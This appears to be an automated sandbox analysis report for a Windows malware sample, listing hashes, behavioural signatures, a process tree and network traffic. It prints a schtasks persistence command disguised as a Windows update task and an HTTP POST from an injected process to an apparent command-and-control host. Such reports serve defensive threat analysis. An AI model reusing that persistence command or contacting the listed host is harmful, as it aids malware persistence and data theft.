Analysis

  • max time kernel
    126s
  • max time network
    165s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/11/2022, 05:47 UTC

General

  • Target

    cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe

  • Size

    280KB

  • MD5

    30b9b7aa26d3a07242d2e6ce9e95f77b

  • SHA1

    fb3e290ec9eb4efcc5c644251817d42172baed66

  • SHA256

    cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db

  • SHA512

    b1155f38f209be6fd732843c5982d8503110d28fbda780f907a0eac7fbf36194f6ffb0f82cba0eb7ac61416f829e61583920c67b0d2c84bd71f7d67b60306a26

  • SSDEEP

    6144:hbtF3Dcrpj3Y6Dxg3gK7+X/7xdgPBT//h:hbsx1x6RSxU/h

Score
8/10

Malware Config

Signatures

  • Sets file execution options in registry 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 7 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe
    "C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe
      "C:\Users\Admin\AppData\Local\Temp\cc97aa8416d4afbf132cb2f5f94cb3ae671093314325f269c7363e14f85193db.exe"
      2⤵
      • Sets file execution options in registry
      • Checks for any installed AV software in registry
      • Drops desktop.ini file(s)
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious behavior: MapViewOfSection
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:588
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x641707DE" /TR "C:\ProgramData\iexplorer\ctdimlhze.exe" /RL HIGHEST
        3⤵
        • Creates scheduled task(s)
        PID:1944
      • C:\Windows\SysWOW64\WerFault.exe
        "C:\Windows\SysWOW64\WerFault.exe"
        3⤵
          PID:1016

    Network

    • flag-unknown
      DNS
      microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      microsoft.com
      IN A
      Response
      microsoft.com
      IN A
      20.112.52.29
      microsoft.com
      IN A
      20.81.111.85
      microsoft.com
      IN A
      20.84.181.62
      microsoft.com
      IN A
      20.103.85.33
      microsoft.com
      IN A
      20.53.203.50
    • flag-unknown
      DNS
      tallersoftware.com
      Remote address:
      8.8.8.8:53
      Request
      tallersoftware.com
      IN A
      Response
      tallersoftware.com
      IN A
      216.246.112.70
    • flag-unknown
      POST
      http://tallersoftware.com/js/order.php?id=7160656
      WerFault.exe
      Remote address:
      216.246.112.70:80
      Request
      POST /js/order.php?id=7160656 HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: tallersoftware.com
      Content-Length: 932
      Cache-Control: no-cache
      Response
      HTTP/1.1 301 Moved Permanently
      Connection: close
      content-type: text/html
      content-length: 707
      date: Thu, 24 Nov 2022 10:01:03 GMT
      location: https://tallersoftware.com/js/order.php?id=7160656
    • 20.112.52.29:80
      microsoft.com
      WerFault.exe
      190 B
      92 B
      4
      2
    • 216.246.112.70:80
      http://tallersoftware.com/js/order.php?id=7160656
      http
      WerFault.exe
      1.5kB
      1.2kB
      5
      6

      HTTP Request

      POST http://tallersoftware.com/js/order.php?id=7160656

      HTTP Response

      301
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      491 B
      641 B
      7
      5
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      499 B
      681 B
      8
      6
    • 216.246.112.70:443
      tallersoftware.com
      tls
      WerFault.exe
      380 B
      641 B
      7
      5
    • 216.246.112.70:443
      tallersoftware.com
      WerFault.exe
      190 B
      92 B
      4
      2
    • 8.8.8.8:53
      microsoft.com
      dns
      59 B
      139 B
      1
      1

      DNS Request

      microsoft.com

      DNS Response

      20.112.52.29
      20.81.111.85
      20.84.181.62
      20.103.85.33
      20.53.203.50

    • 8.8.8.8:53
      tallersoftware.com
      dns
      64 B
      80 B
      1
      1

      DNS Request

      tallersoftware.com

      DNS Response

      216.246.112.70

    MITRE ATT&CK Enterprise v6

    Downloads

    • memory/588-64-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

    • memory/588-65-0x00000000003B0000-0x00000000003BB000-memory.dmp

      Filesize

      44KB

    • memory/588-59-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

    • memory/588-61-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

    • memory/588-62-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

    • memory/588-63-0x0000000075891000-0x0000000075893000-memory.dmp

      Filesize

      8KB

    • memory/588-56-0x0000000000400000-0x0000000000426000-memory.dmp

      Filesize

      152KB

    • memory/588-67-0x00000000002B0000-0x00000000002FB000-memory.dmp

      Filesize

      300KB

    • memory/1016-69-0x0000000076F30000-0x00000000770B1000-memory.dmp

      Filesize

      1.5MB

    • memory/1016-70-0x0000000000200000-0x0000000000294000-memory.dmp

      Filesize

      592KB

    • memory/1016-71-0x0000000076F30000-0x00000000770B1000-memory.dmp

      Filesize

      1.5MB

    • memory/1016-72-0x0000000000200000-0x0000000000294000-memory.dmp

      Filesize

      592KB
